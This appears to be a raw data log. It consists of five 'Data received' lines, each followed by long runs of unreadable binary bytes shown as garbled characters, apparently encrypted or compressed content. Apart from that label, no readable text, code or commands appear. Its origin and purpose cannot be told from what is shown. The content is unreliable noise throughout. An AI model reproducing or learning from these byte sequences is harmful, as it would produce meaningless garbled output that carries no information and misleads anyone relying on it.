Data received ó…Qˆcz B¢ˆK®âk>bkt_ëŠ,´ø¬¶ÂˆSjwЏö&«^m½óêrûÞº uPñÈ(ŸÁ„¾]ÛO®å•4Ü5º¥Ô(*Ð!Q‹îì]Æûäñ{E[rš *šÙá•6º2ÿa¹´•îmøIÂ, 3·Ì4žšªDBþõc¤“4JÀŸž©BþöO½J²ŒÈ¤ë#\ö.Œî6¹ÓÛH—c×&n¾Ü¤{à7ÌfîÁd"î6cb¼*»í¬þ\_m–Ö›O4Ǽ~ä= ‹«”áÒ)l¡ñ­ÖMñ ¤ø-"†ÝZÈt}¤,ïÁKˆšyØËô¶Ño¿´¼Z¦E’¨L÷ҍýuŽCߜXU‰ï÷›¿fÕ:z‰GÐ[—Î>MgL­ìqƒ¼8»¯û p!0™ÒrÐÂߋ ©×M¸Bkæ[q‹%>=¥Rá›/[y3Ús×ý8>‚<úËšä<ÌGcìK{s)­’Ÿz|P³–+¤Ï¸äNDø^‡&k½(1¯'Ù*´>lšk3åÍÂMÌ°ö(n9!¸‚­ó v1Ç27[Àÿ˜ÿͱ©Q<;újXžÁ;ö°ÉÅa~°Ê nd° A^— øŠYBµ ¿+ƒ^&F»Vß;&Á﫜V$áNêc'Øeb¤¡Næ„ Ñ?¶¡Ö2ˆêÄ%€ÏÉçÁ搕BEûñ¶v_A¸»8ü?låO¿½ˆ~@Veè ]ÀH¡KžÖ ,l4ôhDpÈ Àã%[5»\&ú©ñSØ7.;ò):¨ñšóLËÐ!ÍHe§s¹_gÍÂSõÇÞtñ雳¦%2º½ ‡”…™wc}â"::£ÊßGµ’ 0Û.SÓsÊ éƒ2‰×i9 çp~´µì­V­º`V:àr ZQåÕj•ÏþBŒ®uø´‰ïDg‹ª6TŠì-öW!ÁŸ¾3^P½È|«Á³MÉu¿.‹Õ4%kõŽ=q–ŒÔúvI“£’s:ÁTƈ¨Úv5UA4Y$Ê’› ÏIt“”­ì=£:ByßùзŸŽ4…âl§Æ]"&é$yÀ|Ò 1#»7Ì×>ëYÛ`Äר…ú}Ð8»·CšÑ¢û&}YÆ­%J—¬ 0ÚÁî¹”ŸMð¨J'Âó`NZýö >š.{âŸÈ ͨ][À¼+÷¦BÊØÔmõc$“ó¼x›m¨dáVǾ G¡àç¡wÁ[c²Ò<0¶;üî~e8?#ˆq½Ù<îÀI…ú]!–¤¸•M㏋P<¥\еñîÖ֕ÃÆ!²ͲD0£«hö“L8Ö÷Ž[^Ñ_½øEÜA#ÆÃ9Œ8¤2Jœä°N]2¸_—õ”™_ׯçÜÐ"„÷¾Ë 9R»Þ¸¨¨a9ª:(ÄXÆ«„ Œ?åÂÀm>`^Iñ)MVšç ±9½&Ó_[£­”zÏißøÚbœäíÊSAâñàf—gž>8è¿jSytÕ>š¦±–àî7–%MÁÞC­¾Û9À<¸„Üå+{c'3HÊ4׳€õX5”‹#bëK…!ën9´¤Ý‹éÇÔîžMOÜ)–M"Ž[«õý?sÚ*HX•<-‹ôÀP ”x8óX`¼ï€µGk$ôUÄO€Ždœ´²ßÄçF« “ªÀÜÙÆ eæa"ðé zϐ¶ìÙávCêMnžz‡ TÝ)læ|Uõh®ò=Àá3ÕÀÆ ª¦=ñ0s¢ëƒ`²¹5D‚±+.A/n›Ñ³ØzêPñEf´j<<*ңѯìUòlìæ÷}TK ®¶‹qDu?KÖzü ûpnq]Pî~x‰Lgê óÁµ!:âòLªTðÊï÷cù_ÐÎüö¬öÙù ³ 0ÍdÇ7‹Œ ÖIŠ„”\%爣‚¹ËtqÅÈݽìW@RR«…j§×Ÿ‚4e°N ˆ ¢Š»GA(@e£¶`¬×®qÞoqYò«t…Ü®­Þ~M_H¦Zh Ç6Õ;í\™™ê¥gÙ16è­²c¦úD óìʛÉîôüí*âuŸ¬tYÎóNߎ3΄aV óiÑú;n=m[¨€Üþ¼ 6§%Ð×}À­wT,³ð¾9W2Ê¡¢`¹ AIZ©¢ªìXp͏É,5Ѫ¨³²Öý?È&ÅîÒ–ù’ðœÄ¥4u$ôi†ßL6„>±ÿŸº'÷…™¨ô%±…Ôr]ףї˜ÕOÄEq#íÇ.±ãK‚¯¬dü#wŒÒb<æõ>Ódž ø…`DFb3Ð1,YßFÔÑЪöx\ï~ÙˏýÌ+‚cm®µ` Î\Àg*lˆ Ç{¼Ïò*ȱ}!Œ´¦Ëþâoê€v«` ùâÕÏ?ÈóæDMï; ZîT<s8©ØNE \À÷IÉw³Rd»ÝtX÷u®Šƒ'cBe™€1Ò+ØÿpÏrÃåsÜ°Þ¥Øê|¨pNd+$zm‹ILÐ$à€,¥LdÜð]¨ˆïm!r.{WšÁXJp£ ›”f’»L+™þ;T{ÕÍōÀ”¿»¢Ñ;{¦É&މoá…Ð~¾¬7wÌ6À¦¿ŸïÂoŽÂ¬ajIÅU ÏÜùv:Ú9V~ŒGûk ·5.@`=ÔöZHë©CHʾA(þɀäge¢ùQFÇmh—æÉv~ñö;öìÕ\…ô²NÚu2úòIà¹yžyËë×ùþ&¼1,, Æåœ'ff?v¨¨^Ù:`qº ;ĈŠå}DâèˆL¦#Š…Î`ú¸–§é窶t8•šå£´m~7‹0«€ÔÈyjÙûgÞv±0hP”V̘nby ¯°Àèÿ%-è²)ڐ1AŽ¦ã·?j| µÔ@Å\€U.s&ã–þ)ôHÎ6ÿãežÕO3Þ§«ªF6lÖÈK0ú<Ðl ˜ê«Ž²›$œìæØg¤V¡3(jE²0›ú“…ª˜´©q‡g‰v†S—lŒˆÜš>‚¹Ê~€ï`#H±tqM£µ“!ð| dÑçéÔIÕÁ€ÖŒ³¦{EééW¯|@°¹_5Aä éKAϕŸ:Aïj?}j™mÔú“;~ÇÍuߜ”­9û øÙ†GÅ܄Ӈ‚/n2™·ð’e‹Eß_‚²*~nðzâfÛ_o؎g‚zè~+!DBox`šñ¹ ÜT¯³•z,½rÓ¿”Dϼð çOJœ‡fãö­cù~t/•Ä¼¡=·>¾Q\lå0!K¦ ¹%áð‚§ ÜpxZŽî‹ÉkªI*ËÎU8gƒåÙÝýFo7‹OÔ­„ãæ>Âúž¾€ ‹~ áQ‡<?j<ê͐À…Œ0¼«5¸÷É&û ‰þçދҰÃá.,Æ$ ˬŽ´o6:Ç0Û녮Óât?; 1÷Ð÷ùvÊSõ°W‹Þ_¥Gԋa&±òÔdOÑ{§óƒÜ€8*`Þ~=RåÃN7õÐì—Á!( ,®8 Šfî'\t®Ï^”n 'õ#oïì+È/V‚Øò UŽsKLd©›4÷ŠB‡°`œZðÒQ <©œ¶ ¡°†º6ÿY¨,xû º 6¿¤ÖiÐdÌtm!š‰Ü˜+{áõJÐ]½-)"'lI¡;_ù|Mæn9Dži)KG6ʂVô¯:Vä]>ÊEº©¯mKSìtB0¤zZ³Áz®g·T”\Ù¨N
Data received á„]¯P®±å}µD½?¾»ü<Wç»Ù^ýG–a… Ey<AžtËXͬ•/^¡ `1ÈÇàÒe~ S÷45WèFôX¸"dCªåHç[l³;‚oÐëÊàˆƒÎKÒq uºÐ7P8¼áZ ûV³szÖh1F ïiµ|Í-—6;Å;;žÍT˯ðjPÕ;C8áþ æœ=X*Þ½ªe•æ­O°Ät‹ ÕcþüšWğy×¥ÇÕÏNù˜3K—< Ö3†>ÆB{ç‡^­«r©×FšÔö ÔG)½ ==»Ý N¸ŽLïÓ֙ÚûŽºÏñ–ñ­åûqbÞà Î5Á^-~N0¹íñâŒ×Á<ÀĸEƒòòD´lýOáLKh:|µõNðˆ™gÒ ¬´¡¿‡@m˜kœëbšÕô‚bOŸ­Âz$M>Áx\qíòØà&ìx¼4F<œ«:ŸÂ"Ã@èPg†„™#+M{k¯Xd́pЁ¼· À´Œ§ì±D4®–KĆêõ/{á£û«ijY¼ðÁÍ]'ýò+&êAå.µÉƒêÿñúyƒÃ®VŠ5 :Ó9y9ñTƒÖ ·ØC\â `W ÙZˆ–{’±_؀È] SËÇ"J‘ûþ‘fÏnΆ Ö­šaéƒuîj߉,ňĊ˜¼_ä¾àgý®û<킋ÁUað©.9‡9pÊיîx)¦!3[* ¾šKw#BH—"˜^X ·$Ž y þ¹ï¤„óò½#s9Á²“rù$ ©ÂñÊÛÅÄ©•úNzÊ{+oÍy໅6öôO¾ ¢¡)Á€§F¼ò· ’Ýæ@çȧÊe?55µ« (B²$qNFn§æ5ìê¼'e‡–µO”_ÄYŠiž·,à£Ù¦)֥ƢÛ.–1Ð0”„b9Ã5O7’h÷‘+´ xÈR鎳¦!碒%Y,Ӌ€pØ*‘A¹€úmµë!óªl\—§0êÑ5x;_h>ðíe!"=J,äPîÙñ+ߊÎÊâšjó?Ï´ÝÆ·|â+ü¬û̪¥$“ÀU'¹ ¸ù2ù_òë€u} •œ}¼­3óPæ½=eÁ`ò"2#‚Šœä­È›7þo2¥QþQÝýÆX%l˳m±gðÅÂÝ¥Ð;ë2`ÐU¢] e¬…ì_kZî=ò«6šûCÆx|ƒ0¡âiIü<劐"ÿz€N "ÕAÝwåÍw¹eœ¯»"Á×,¼ Nœ¤Ù>BÂ菋]¾.þù¿qÃòDtpe#üP×`‘£pAjï/½ìOT p/9(áâ5Մ;=¥¸=ÔÊéÉñ™_}&o¸:™Ÿ;ùºÛl5‘ Fßsåt ³×ø h‹ÇeïªhäUS„8DÏ÷|:X‡úlè)?Á:f2~óg^ú¢ŽLüÝK[Æá"£{–K¾ ˆ¹‡Fgšò1†œê·œìžè=4ÜQß|™ÍÙí±iì.?R§ë•49bNѶ0í@9íd™1þÙÑçöìÒÛÙCÐR}Þ BJ ¨Íôüá¼ÛJ«±91FßÔöN>³èW1NÂÚÒÊR/K¥òÎÀ;5ÝÜ­m< õÍW'_ľò^› Ew×Ï6Î`M“…B13þ";É.hᤑ?!l¨ð=ŒsќëâñiÕ)èÁP|LAW]áJ…qç 0*ÄwÆ®CðÊ=¤ƒ^ÒÚ5K›ôášà3Çp¿ww‰u*®„)¹Û·åÖ d¯“Ò–陴²Šž^š —È s·qù€JíIéä¹5%Ù%ªö¢Ì; ôRÈå'yãvî¢~MÐ,#Fðœ
Data received nÍp„l&Æ©¿â®½Á/EN©Rqä¦ hôcÌ%­[>XªGøµÎd+xC°,ê´\$}{? þ¥T«³zÌ1ÌnÚ-”"Ƨ<Å{³0~4íìˆÖèKñ´îþgΜ!ªƒºçKt̂׽•ÕŦÚÌíâî؄ŽW* %d%ÐúPð+Yf€D5TV’s3˜æ¶UõDb‡tæøpSY(äoò¬£¶§•„åNÈxãˆAA9iƒ|ÿüHàÞRon.rð=ët2CÄâ–؏W-ÿw¼Ëêo­½&’;¼NDöˆöW˜ŒPy&ëY«Qɉ[nð!éÚÞóº‡ÊD¶7Ø×HF‚°Ïa ·úý^rà¾ÿ&ÜSãvâÝè‹ gÔáDpë ôÿÂ!ŽŒ­¢¤®®‰Ð^>ÞR±Ê¥Ì–²Ò ëù£©ƒõåx•`ý7U÷×]u;—©ùaäN v`Å\¿ ±¤>õ%˜”¿DÇKÔ<mê;9~ªr®ï¾bÀE1¢©Õãé˜hû o„d(üïMVÿQqb;“MÏ&;Lt2Nh=YŸ “âÝ[ª°!ѸÂê5ý÷vDÈ3À2yŠ³‡ü8NWsp§0X=ÿ ahÙPz”}Ï^çÓËl¾I,KQ‰ Häýbƒªøø§ äÙ#lsµ“…Æ¥6¯Ù³¸ÉûRT*†Ýϧ§ëp«‚E¹û1ˆÇ¦pú˅š¨cðX{-GϱBαâ î{†>†"É*¨‡|±;'xÁý Ý~/ җô°­ê?Úåk¯Dú• +öûvÒM], EúÃYô?ucmå¿*£ U¤ÃŽ7pÆ( HZÒD²®ï˜vüÇM¤.õDóA Um!%פ5aô©õ¾¢BÊ^"Ò¨‘nSq”—5Žï½ o@Æ{ûì ¦{ž:0i <—ò‰ÿ?!UºƒBùöV–:“Ž|Xё#~Bˆ@Pm)ˆÉ¯Xî’ÖAù¶Ö&êrýÏ1Ü-ªdõàµMCa€tR…&kHâ2Ÿæ]vß[ühãu·ëf)¿âTà„Ï™®–ÊWxð0³#.‹ü½úz]ˆîß3º¡Zø®Ðì†ÐB۝ôá6žl5åíÛÄñۑßaÊƟ„æy÷ÔüöŠýø³ÖPN )—!Ï£q"xbMÃÁlà+3ŒL%h¦Ø¤F<‚ëN%A'=‹Òlà¿=X¸!¹¯¤dóäÖðŠWº ©X§åÚ¯¥¤j<}ßÐ=ÄßôŽy‹PFËÒeŝ¢>÷E<gˆÉÉXä+€ŠTJŠ mÝ:]C±s—ì´ê‡xÍ»m`œ”]ÛS¦^ŸW#¶íïÀo/ .´ÛäKÀÀ•ãþ{Œ¢ö†ZR ®¥Ùóå6Š¡§®<  àbo¾›%<ÆÖÙ8FÎ:èJû,#i™Ž§y«ˆÐ{ò4z‹®'џ±~R ûØ)uÎÔU›ü“¸)iuòÊ£ã£ß½.Û=o\ü­ GçºJ遞Q¬—â|ÌýªðjÞ(â¤pƈ¬e!‡ò"Ž=i!ŸÉs±^/|$°”ì (EHÙâ‹8B¾³h¶A|!Hø È:q¢æߤ)ôã'M³Ø̔ðà×CoÐí7¶íB^‡ÖžÃGˆðmÔGP¶."å_(€Êº·66s$‚=­¨OM™q†cÌÐ}9%Í®ÂÇÄΈ msôäûÞ«mÿ¥k`7f¿æÕLéà g;ádY˜=>1øÀoðøµÓåºÿp«FM!_3C„Ðoàë*€Ù'YUßRېÖY,I^ÞÒ+ë0o|z; ÊO]g—÷~ՙ­ƒ´ÃOÚd¸_ˆøßÜt“g”P­2òýÇh¢¹£*õ{ ÎûG²œÇ‰,¬îq•Õzçj8ȜW¦’AW”j„}ÇÕxœ †s Þ^Ö (ÿÌ:Ç;žÿ‡¸š:SÝS¨Óo+´†´Þg-<áDeä¼OvÕ!Éaî±–EÒ㳖ֆ§öç9©%[Úáof£r9ù~vzvã\Žр¨êO°›ÛNøIÆ[¼×ù‹Ò·Ò4W­äI2—AˆDU÷<¸ýY@F¦qìp#z²jg, ·.ShÆÎ]Ô­Û %9`dM¥ø Çîe ò֋¢DUŒg[Šþ¨ü`Ãf•“@hx€]bf¶äˤ©ýO-¨o)Eò¡¯ wiR)^¼hç:ëF¤Ø¿VÚ³Qs>´äÛÈwrçïoÖ½p…ôC3æ+³mâìWŠE›Õ±´2]¬l$ÞÓP·Š1•áÆB$¦©8Thú®p:X×ÍzMA|‰ufn÷:\‹·4†»1՟î0ºhË>잺†Ú8HaÉõ‚Ô•V{Æ _ïûÙº!U££½‡´ÈI“Œù¢.‡ ¦äOdy|˜ó¶McÒ~i€Ð¯Æ0|} z‚‘óý99¢Þi«äŸ=dY‘#¸ÔåØ$p ¸› «£Z4%I什•3 Ú£!ÔúGà9ù´‡ÞǞí¶öÁ¬“ÆV< ¥*-_Û^VtA8AA- ò†ÜȺ¸¸9ãjª£9µ4‡Â:b÷ð9–ïiz½Ù©FzV]gøßQŖÌTÜόÃô1¬G.m|˜fi%™íFͨV†+ÉNúÞ÷ßô#µU†«‰ˆnÕx ª_ùrȑÐB‚W ¬’ ½àfŠîºö¨X!¿øÛzC‡`Š faD!1Ýpœ§&r PÝYÙç<v6ýéa¤-5e“X­wMúÉÏ2óžTÅT¿É^ „.s1ÉՙS­øErž%„}'ò¡àSR] ?”%ÙÚÑ0øì“͐ ýÛñ ÃSGG©ÜNžþ;¶“)ÄÎL8!%يÉÏӢ~ýˆ¤oÒL2û Pf,5‰X\¥øYÖNñªÜi¶¹Á¨rB7°ñ¡5ìi_ Õ£]ü0®“åPæ¬t:¤ïûd*J}¾XPS±£þ9`ƒ=™z0+ñ1lŸs EÞ´=ÝR§Í¸Ûòãš×£NQ1 Ö˜"Íécà)Òñވ“ ÊÀP¯À…Г¹zN·A¸›¸všxÌðƒëÓ?¤„ÃmAz?ÆõmqÄиß÷”.x¤ÑcBës³¶}¶5Å:·÷?RjŠ´,®¿£¨]ÈǍåö½7V”êÒ Zö’ X-b/³°W{ò#0Žùïz5gÂ?FÖéÏݲküb«Ð6Ôò­wd´Ià–6‚ˆf9—ŽÕ/±7”¢Y]RÑ4äZ(Ž âÿŸe¡ÒåºïU—È|{-9¨O…8+ðk&Ij‘,(õ<Í= qÎâвËC+Êÿ­„"¥xĕ%t~±‚ÿ³z]S´p@ãÕ6-¬¿ÛQ1'¯"ßËaÕ°é‡öóOú£¼Sƒ%»‚Oc¹j}Ä}ùýº¤úNcÝ°gZª+œo¯ZA×Âhµñ ø‚4O±ä2ŽvÎÚöz— :Òe[Ø-”½SÚòœy©LN7!ˆc¨z,‡†Ï“;ŽÀl$3Ü{ ñQŒ¶|¸i_y‡îƒ0Kъ‹ìJ¹wbR{}Kƒ=ØjÑøFYDâý…[•½˜¹ëÛÒDã¹^ ;%+ñ"9֞¡ýv_‹o°a¥>Ûa,/A¡v¼O°.lï”g}®O¼NИ¬ çXðcóôÓ[ò¡0nZIͱµo䰀’uFD2ê´MlR /*Ö3Œ*±µù#±¦¿¥xl
Data received ŒWý›ÍsЎ™À³_„ Tôô«Ý½;­†ä 1]3×¢/D>å&†óÒ·)ŠG~ 0(â×r¾°û‰KѤÈc02ߧR'½<ðëçΑ´–æ€LdžN6X_iÄv;|¾–KçöÛ³Yþ"]@;»,«²^ˆ Ï°X\\›ŠWïãÑñB‚qU‰(ÂÒßA{c“D%üSìW¼bãj›Ÿ}H+ÑmùGlmØÀŸá;­±åRQ„Ûø§b¾ü B-õe`+Äqv•ïÒ=eÍú˜ÒÀvØô¿JîkԂ¿ ®Xht ‚cèFRê6D—Óº©XMÉ*m\µy à‹ÎÿÏOз¤ÜbÖ)<zøšAôihvøÀ‚Ï.÷=‰¶7p”èõ/A¦9 ‹âÀ‡à¶á28dB~ļÔtÆ̜ 7zùßsŽdE|1Vuü‚8_ •ô?‹š}£6¡È45 i¦Kù}µK„gÚƒ@VÓ¶“6Ï$\T%Í+vòmh‰G”mZñ(÷·,B­­ÖpÝ»¸" àª7±+F6Š)Àk¾*šŠt*ˆ“æe`Ʊ¹ÒÓ&àC\3F¯ÆύꋫøÜ7Ê hûð1 ÛH|…Šn·ã@Ãu$¸h8&‘ŠN#Ü(·xÉz^ß"Žoz|Ôïm¶vò$cÕ{L֒Gj0…„¼Fj„™—ë;‡+ܯ’¡b¨‚sÈÊøéŠä㜗(×ÝÐ[Fês°^À*1š'I;ë?5–Å¡¬Z· åK1$â½s"31X~²Êž4n'€2{ÛÌúH òÎ*?º€ Š"™MâHçžÁkw0`?qK‡ò’wé Å@¼N®êõuµµÁ&§gˆtqÄçôJð4$,'SxÒÁǺ¥HD c†pµ2„l÷WV¿ËĆ HKC`X‹çžFd³ª»œB‘]wÈbÌח–~/n°¦@j”›•ž‰ÂçÎ7– NÐS¨¤`ÿ_gó6rJ„_›»¹ê̹¥¹%j¶²¤~„.–Û¤g‡ê€TE·Ó¦éóåÞëÙd„•lº»ŒŽÀvd7徊¾Ì—*•D_Q1Ô*0j°ØÌíATƒmÐߣ“ËÉÔï·ûarƒðØ“B¸ ÄP‚>ËJ@ý‡˜^Û5ɽ/:ÔµÌxy5/™2‚¥[ù,¹´Vk9»ìÖp'`†¹vþ•À-á Ôc¾ªý¨Žm:µF?˜N§Å?{–[W½Ðï ¥ÄžàŠ(´‰{þZ¹ŽHløýã½Y3ÿaû—ôX?߄ Q~›ìP¯¿gÌUj9Zÿá2ñ‹¡äؗ"02‚;@é¢pî´+ÓRyÂtˆOBÕLTd¶Tùèê2ëI5úïaZm0Ò{ˆËÞ²-„Xoh)=ôw1aB^R§XRœŸ1–É´8rÅoð͌4¿‡uÀ—ÒêRn×r=l% /˕ðX}ž ¸¸… %FgëGþVÊ@p(LR·l띊‚Ä–7WN‘ªº{kõFÖ^ΊmHVeT¡IÒ0#çæWã)‹¨¾’ùYóç)Ú19çÎg0+Âý®þ›¬å¢ÛupL ƒœV®6\ ;¯Gjg§£{¥ª3/U˃$”ða¥š/Þßi1÷4Õ èïl»™þQ Ò\¹ûk˜ïKÂÀã ?¬ ŸÉ,}tA\øÉï=Ÿ· |Dmr¿¢âÀtü§Ü³@ã ++̟G/0·OÙÿÉÅ© <üM#ۈ¨‰JÚ'øî %ïË_¹‘¤kÿuWNuë|äJ7‹¯ñzvÃcw„TÊ¡ýkIJA&ÁÇ<…^%ÇÇÁè8:pöþÉ˱P.âÜiÕŽ{֋}GÕÄVIƒ~è:Y°ÁbBeýÁwÔ´ç¤Ç5ÀE½^!œVü€°{uwØiÇ㔨<õX„,½¯[H»`¤¢3ûë÷{m%{Ÿ¸÷é>8Êi~`"¾‡Ÿ"ÑFË"¦Êq,æ,ò>§•V~øû>©‚;H°¢ðLĶÃ?v=BH3L8ÿì ŠzVﵕ7X£’ ²4ìHR5Épw7¿)UÊZën߯~ºÀáUÿÚüËCf¼)9/E”¬³´¼· !ò~žˆ+n­‘Õr¶Y@8}ۀƒÀ– Áº7²$Àɘ¶á,ÒG÷`mÁÛGÑL­ö;Õõo]x‡²{¯…)d{¦–t¼¢‘„5ª™‰ -«|Ýސ³ÉÿawÞ­qýbd<«S’Ï3ÎvIrš ©>8äÐü–`LØáãËdij±¾z áÃaY¾U áü鵫#EP¹§¤—¿^êÐe£Ð×åæQРzò Ò£×ꪲ¡o¡] ý^×ø[ÍÎD½Ü×¹:{S0[ÇIZ%N%¼\:U|žÉ®­·,|éûɟhóÞ6mO'ÑîêúߚŸ`Å«¢Ñbd«"¢³G‰aÝ"ôæŽ`˜¡†Q¸{,Ñù;>U1|HeCçy¿³¸ˆÑÏa§sØP¥êñ [ûE¸ã֊ZH>Û$ØfnbT³`ʳJ¶rIáx @ŸqÇO4#ù›áâ¸ÂY„¯dÙyñïÒ'FÇPŽ¢±ç‹pÕ_7Ì nWÔ7+„Tß1,oíU„Wþ½ÏôàœýW €}§3·¸‡(—E¥íþ-„˜øuõñïÙØ«:(¬±S€8÷›àlN¢´Å9žÚÛ£´Uºõ87(8 @(ÿ!ýÔ¸ÁùšgN±þt?äÀ¬bV‡´öОð9õ¦Lñ1‡:2t=’¯8uÝÈ£ž!æÉ5E§`‡N9ٕn¢Àéº}ò¬&›äºsƒ¾€ØMu gƒ'Ù7\ Õ1†0/s|D9¥5Õ¸_ë.WÜz$›Û’•š!Áb“ŸzÊĸ:7Tm)›G!ºZ3ÌÄ'Q“BZ`æꓖA°Xw :'ý78”Ώۑ²Zžè‡Ÿ $Õ!TºØR@›“«I…Åy@áœZð,Óu‹û^®þŒºÿ«æДÞÒ|9BȀe÷%¢=ÕsŔ^²ÅTt®™³FÅ-”ÛÄü[ÿ‡ŒìŽt›ÝW’2ÿ#”Š«Ø¸–7šñŽ¾¸ú™Ü¯ï);Ÿw-ה%nU]e(lùz)_S$ýÛˁMCÑãÝF ‚&"Ö?R„‹Ïz¾eÑmÍ!¶<¨¸7hÈ8$Ó+ÚõlU7MZ±–üìq,ïýS™¹e˜ákÌ4K<L–N£ÛQÓ؂YÍàFy^H¦ÉöŽVþæê’l0³m­~@(’0Ðs#ÀýMf€kˆ²þò§ô²“Ÿ9Llü@ƒ‡ayíìG>ÔÚ»îËl1`XnÐÅ2ìè:}˜¹Ibÿ„O÷<+ú´ë±6à]µšÏ6‡7ߨR\”"&Q‡#Twê‹Õ|I›2¢ñÖÈ߇èö`.·C€FA¼.¹‘¯fÚ×í¯bOÀ³êïÓ,W…ŽZáÓjjzºåI¿«aŸq_ ÒdGp~kk *6Ý)õŠë¨LlI C?[à.[ÿI`>$‚yoß$Сž©ÐtÛ Á)û Áø'è?-ÏðàZTƒtf(ŠÆàþ5Š]é1<Ý’ÅÅ̐ —×8p¨*®ï÷nÏ`”"7p‡p“ Č RÉþ;,ÛoG@ãpO„Öñž §[s>xŒÖ·yÚ|Mñé¸oÇ¡„˜©“?šoÿèƒ6\à©Çsà4‚
Data received ÅaRNÓQý×óª16z«æ“ßLQ)—Š¾h®C;¥¿‰i=Ž2Âw‘„1gk©õ‡ÊêV]=s¦Ô äSÙCÖÝUñCI s@‹CݓÍEØ·/eǼHFF1Þ9Ó}!>ŒíÓÃ&ÏÄ®'<7§ëe<™øoI¨ÎŒIäZ¼ÿ*"?©pw­ÙXò^ Ýíhšßu6à„ñˆ®ë÷Y––(€^±d»l÷ŒÖ&ýÑÇå1“îF셉T½ˆ+¹°tËkaõ‹°~•;®ùÚ9ñ•øMFLa·û±ºÌtÙȅýZßG:’u$Ê=<ó':ô±íd0®1ŠøÜí¡<ßö+ÝñϞ´¨{Cœ†#ÝÆ|Æ@Ì«ÛZ „ìZƂÍY6dQÕÌQ‘©;1Ûùk³§˜æò V= büÒ°˜*’=E1­x·ðóìLšÞ9M' ³v}¬ jüì½nH˕ù‡QðZ̊¥Õuú»~Mވ~s2qõœ‡"ž¥ ¯U0n<cðäJo·”è.FÈáX[Œ')y sÖ¯ÝW%œµÅKíiÚȹ=%_aɺäIÖXgˆßnó¥km鞂dƒJ¤®.Å.ç)W³Î_éþ ŠW¬€_ebè±¢¾g²ëk+9¼ÏF·Sû{ &ÅVQLCm7ŽYùqcíÞÃ<`VhdvÝFT¶¬Îa· ߋ) ~ñ7H€Ø]¹«[Øp0…"UÅmad–¦Ex/4Pj*H5*ÒàL˜H¨Þ8Hë)_&Wri†nüz½7Œ›Î¼%m±»*#ÈÞ2_.U~y“½¼•å?h  ®ŠÖ_PúWŠ§ö +ã ³fœ¬L#ïF«eƒ›úY}àfäç-Hۚ|«(… hü1ËüHˆòçÌÔ¦$º×Ü.¿ã­’%”öµóüˆ 4„^”Gžxeî> ?fd‡¤6ÜÊ×›_M8Ú&fmžxG>HýV+Ù<]Ñ3ä<Ã?+*îðçûG*D!ÒgÀ«¯|L•1$ñ +°˜Ž öýìÉypŒn!\{Ôϧè;ÏWW"äèUk°ûœûQÚV8Çé5©|ƨr «oüãs ß<.*I|Añy׌3•±ƒa#âmÄÂè° ²§4`׫ûœ$/¹zO.ö›àe‡Œ,ëx;iTƒá†‚yvoôHSÏ¿^Ûì;í\ë¼ÝÅlb(6ùÿ“(í+K-1Jò!5%Ða»ñŽß!Ÿ…~Ë(|ÿ'bØz™õ‹»þˆ–Ó ü_§<`øh‹-k•S™ü:nY1^v¨î¯×¸¤¤æK¯rþàCE¬,Âó¨V±]²ëš¡p[Moã.B‰4²]{Ñ` M¸(‚^D¤ÿëÏ.ߧ"åL{)š±Raö†žŠÌÉEžPmi1‚uC©Fëdähj¦¤çp±~Àã«5mU:Bú¡iªÆ6´µäELGñÍq×oËæ'ê%…Xãâ]mY‹!G`Ý´ ¿oVÀ–BIF•QIGARŒwÍíèn¿™§Uz›v¨‡@RÄ}k!™r¼àûˆ”(Ëÿï†Ëý\hv§Ox¾a!w $nëe9oˆi¬ÁgÀ0e•‡ð…–ÑÌ@ ´J›ii1÷ØrúØP,)–›7•ØA¾ïìy³I_è(#¹9¢Á`."#—LSwÁàm<ï¼R/¶|rµNaìjï»kŽUŽ 3ÉZÖE¬ZºVUø4~ñöÍ**ZRÕ¥\'ˆY$Õ Ðq{į(´Œ-)þyl•ÜúöJ¿¯ˆ{¿ÄFLZŒüè™(Vßê·HÃ6I2]²7\iDc×þµž.Ë6ŒGÆÛ¨wԀÝlí¦ì]×ûÛªÚvn *õ%í }i5Pç+aåùBeñŸ$ƒìûdÈ녞#"° 5€7½Õ}u§˜ÞTùkܞAR–—‘öDGb„ÏÅb‰Ù¾Gg)CqÎhêµãK 0úò;q¸-ó²ox›wí씰عîÇgృLf§ïE‘«°“Œžä®–Þ[ô‚PÛØßdžHæüaDšSøǖ91]G¤çz1“›ŸïTch[„ȳRÓ)Ëaô° µoP#.’ÊΙ-ØÞkÉ´¶iÿE^3ß8 ¦ †7?•D^žš!²•¿Õý­:ȏXf>o¼jd\­AvÓÖ!G ±u«ê@¸7Òñ­¦w@­€ÑÁQ_uÁˆé¬Yº"µ,ø#&V•”?ú3vÂk|¤ê™ï }®zšSCL³’·÷¥ºt™¾HTŒr,,/Ï֝™épÙƯ sMŠã^ó¸!ÅÚ\È`)§¦H`Z#†îAšb±],|—íŠ k¯m³”e|ŸŒQ>kßù»»í Ø{hrràxÎ8ہðŠÿ.#Ê>bTä<SÚÔÕ{hMwû@‚B“JÅ ½yŸæwT€á$qåT¬€rgèHníÖ.Jˆ ²™3ŠU9xƒcìß±rýŽº–NŒ@bÿ¶Qk§ª—·9§i 7$Úî°1ǯŽ ö– —%«7@møV„4Q꿏LÌuuèÕû¸h„VãåTu‘uýØ64{ö!aÚA!—Âm[kZ¾ÌE1¬áíޟk{%?gâ¯ûɽË4¶õÙ »l ‡ã”ô£^pëöˈÔ+z¾ö.amR·_¼êy«Æʾ>1oÁ—°À´.¬,—a Û)ÿõ,›_¬9êKJޘ¾æúòä!Ò&ßÖ²‚§ä¡ãŸ­â¾> ]¼µâµ7Ÿ¶rÕ&òø†ÙeãÝn¾u›€›5 § «F}LŸˆ¿Z±¿ ãþzRʹ²q;x{<o°B8՚Íí+>U’‰v9" U¸Í5Ú=³ÕàÀ¾óFÃbqƒØ«—?:DÚ#°ë ÑR]™O³ÚÔ»Ð²p9†Œ²u›šty‰cæé`æ 'bʛ#sHŽ,Æ|9 =ërùöœ5ocMû =Ê/MqáDŒ¯Ýõ{ÕÇ0v®HFƒœ¢€ñÐ !|†‚ð%Y†HQŒ¯­6¹@ùgòZºæávñà5GD ØÿeÎøÿ?ª®Åu´ aªâ’ EqçÝ4kSb À’gJÍ¿œZsÕ»R–Ò!V<­‹‡¶£ ÓTƵ ¾Êší*‚ßù©:Ջ€ñ¥%ÇDôæÓyÑ[ͱωŸ(Ôa³¼´q9+ëøth“¸"·2srâÔÑù ï»e55ص ¯ÉxÐåÕa2fŒÏk).µ K4Aª7ºZ WK¸ú£òYû-“PrI½ \LÚÚ=¾V¸-ÂSwûÎ[oàÉikäýOik 0×9 5¶…Ø~Û*8%!+µß¨$ŒZò6kn 